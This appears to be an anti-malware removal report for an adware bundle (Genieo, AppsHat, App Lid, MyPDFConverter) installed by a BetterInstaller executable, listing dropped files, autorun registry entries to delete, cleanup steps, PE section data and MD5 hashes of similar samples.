C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo.l4j.ini (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_stops_stemmed2.stop (473 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqB000.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsqAFFF.tmp (33533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\InstallGenieo.exe (18368 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\genieo_temp\genieo_setup.exe (16903 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\readme.txt (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDOM_FAQ.htm (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Jericho HTML Parser.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JDIC_Plus_index.html (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail_SMTP.txt (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JettyNOTICE.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe (18964 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\JavaMail API Reference Implementation  Project Kenai.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\fct.dll (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\License - jQuery JavaScript Library.htm (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\Elevate.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\iehv.chm (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E5.tmp\KillProcDLL.dll (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\IeSearchProvider.exe (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\OpenSorcePackagesInUse.txt (295 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\conf\conf.ini (227 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Launch4j - Cross-platform Java executable wrapper.htm (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\iehv\readme.txt (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\oauth-signpost - Project Hosting on Google Code.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\license.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\conf\conf.ini (21 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfB8E4.tmp (32607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\reallysimplehistory - Project Hosting on Google Code.htm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\uninstall\updater_uninstall.exe (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\IE HistoryView Freeware Internet Explorer History Viewer.htm (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Apache log4j 1.2 - Project License.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozilaHistoryViewbrowsers.htm (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\prepenv_setup.exe (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\MozillaHistoryView\MozillaHistoryView.chm (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\SQLite Copyright.htm (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\Licenses.htm (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\firsttime_setup.exe (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe (10430 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\license\LicenseAgreement.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\default_config.json (791 bytes)
C:\Users\"%CurrentUserName%"\Desktop\AppsHat.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G44ROL1L\config[1].json (778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\scripts\config.xml (819 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\Uninstall.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AppsHat\AppsHat.lnk (2 bytes)
C:\Windows\Installer\MSI6613.tmp (520 bytes)
%Program Files% (x86)\MyPDFConverter\setup\Setup.exe (53 bytes)
C:\Windows\Installer\MSIFE02.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI2648.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6B2B.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI605F.tmp (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI6A40.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI373A.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FD2.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI485.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\MSI5FB2.tmp (520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\framework_setup.gen (1026190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\updater_manifest.xml (297 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\genieo_setup.gen (62942 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\genieo_temp\trayapp_setup.gen (201149 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\partner_manifest.xml (550 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\log\Updater.log (11205 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\upgrade\manifest.xml (644 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Data\Updater\conf\partner_manifest.xml (550 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\281.js (485 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\36.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils.dll (28539 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\182.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\288.js (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\14.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\234.js (1 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.exe (8330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\78.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\nsisos.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\extension.js (354 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\46.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\253.js (737 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\64.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\38.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\180.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsk2BA3.tmp (718555 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\2.js (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\StdUtils.dll (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\41.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\91.js (6584 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\345.js (607 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\ExecDos.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\InstallerUtils2.dll (3410 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\207.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-4.dll (46278 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\183.js (2 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil64.dll (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\176142 (17985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\354.js (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\37.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\301.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\252.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\22.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\150014 (243819 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil64.exe (2105 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\223.js (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\45.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\21.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\4.js (3312 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5.exe (7433 bytes)
%Program Files% (x86)\App Lid\background.html (729 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\ipgeoapi_com[1].json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\43.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\263.js (1 bytes)
%Program Files% (x86)\App Lid\utils.exe (90899 bytes)
%Program Files% (x86)\App Lid\App Lid-codedownloader.exe (8319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\17.js (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\242.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\177.js (784 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-5_user.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\184.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\7.js (685 bytes)
%Program Files% (x86)\App Lid\11a9fc6b-cfbc-4d3c-943b-7e1062933d01.xpi (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\28.js (536 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\13.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins.json (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\40.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\255.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\221.js (415 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\47.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\195.js (410 bytes)
%Program Files% (x86)\App Lid\Uninstall.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\userCode\background.js (636 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\9.js (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\220.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\UserInfo.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\39.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\94.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\102.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\72.js (1552 bytes)
%Program Files% (x86)\App Lid\App Lid-bg.exe (4185 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\System.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\262.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\42.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.dll (33295 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\3.js (63 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\44.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\35.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\1.js (10 bytes)
C:\Windows\Tasks\11a9fc6b-cfbc-4d3c-943b-7e1062933d01-1.job (77 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil.exe (1425 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\manifest.xml (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\104.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\246.js (8 bytes)
%Program Files% (x86)\App Lid\App Lid-buttonutil.dll (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WDUL1PG1\manifest[1].xml (25 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\md5dll.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsp2BC3.tmp\{B6FD0097-44C5-4CBE-9C5A-64B1135FAE26}\plugins\200.js (809 bytes)
%Program Files% (x86)\App Lid\App Lid.ico (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18} (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (IA64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDB5.tmp (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A7..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BDF4.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC206.tmp (668 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\USU4CORO\MyPDFConverter[1].msi (3239144 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC345.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C344.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC186.tmp (672 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x86).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC216..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~BE15.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE27.tmp (705 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC284.tmp (647 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC1A6.tmp (671 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\_ISMSIDEL.INI (31310 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows XP (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Setup.INI (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\0x0409.ini (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFBE.tmp (692 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBDF5.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFDF.tmp (667 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE57..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBFEF..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBD94.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isBE16.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Installer 3.1 for Windows Server 2003 SP1 (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC333.tmp (77 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\MyPDFConverter.msi (88453 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\{C0C9B04E-6F25-4BB0-B132-E21F7C556C18}\Windows Imaging Component (x64).prq (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\_isC295..dll (15945 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\~C332.tmp (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsvF068.tmp (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\firsttime_uninstall.exe (1568 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1504 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7B8944BA8AD0EFDF0E01A43EF62BECD0_0B392C5099259E005752375141B9C59A (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 (1212 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 (370 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab290.tmp (56 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar291.tmp (2784 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce]
"mypdfconverterfr" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"AppsHat" = "C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GenieoUpdaterService" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Updater\bin\genupdater.exe -wait 5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"GenieoSystemTray" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\TrayUi\bin\gentray.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.0.0.0
File Description: Powered by BetterInstaller
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: 2.0.0.0File Description: Powered by BetterInstallerComments: Language: English (United States)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 28860 | 29184 | 4.36907 | 33e8227bf6edbf3997e3d0895494668e |
.data | 36864 | 140 | 512 | 0.818223 | 1b0351714f371c0ba066871d4e504b00 |
.rdata | 40960 | 3196 | 3584 | 3.54441 | 88a268b1fac88e9fad865c68cf3abce2 |
.bss | 45056 | 110088 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.idata | 155648 | 4932 | 5120 | 3.53424 | 11c816edc4ef9cc4aa5511f8a707232b |
.ndata | 163840 | 36864 | 1024 | 0 | 0f343b0931126a20f133d67c2b018a3b |
.rsrc | 200704 | 17800 | 17920 | 3.9497 | 3b952b6cf19449d255a36efe2cd57cc1 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 3653
7f6d030a23f210ff0f767468fe3edd48
13df569a80b0b685ba250ad7617fe738
a16c30b5aa236dc78beea2d35406b2b7
b3fa5976434ce1e51a1bd370e2aefd3c
7f9d59c48734f851495f71f0c539537b
22754d84b6a8863fdb8bcc5c56c849cb
58fe62f415a645bea095e193a1676101
2a2a5c35d16c851fbe31471dc439b39c
92c551fd1abfe685fd18911e9ab08526
0d213295b19e20e1fecc37345c3e009b
e7b769fcb3292ae349d046038146b08d
a6fc7dda6bdd315dfd5980ac76fb22d0
ba8a944ac777b66e2f8831e41c48a17e
52f55df57abbba5785a9fc223655676d
43e6206ab7ba8f798441f29b86ac7746
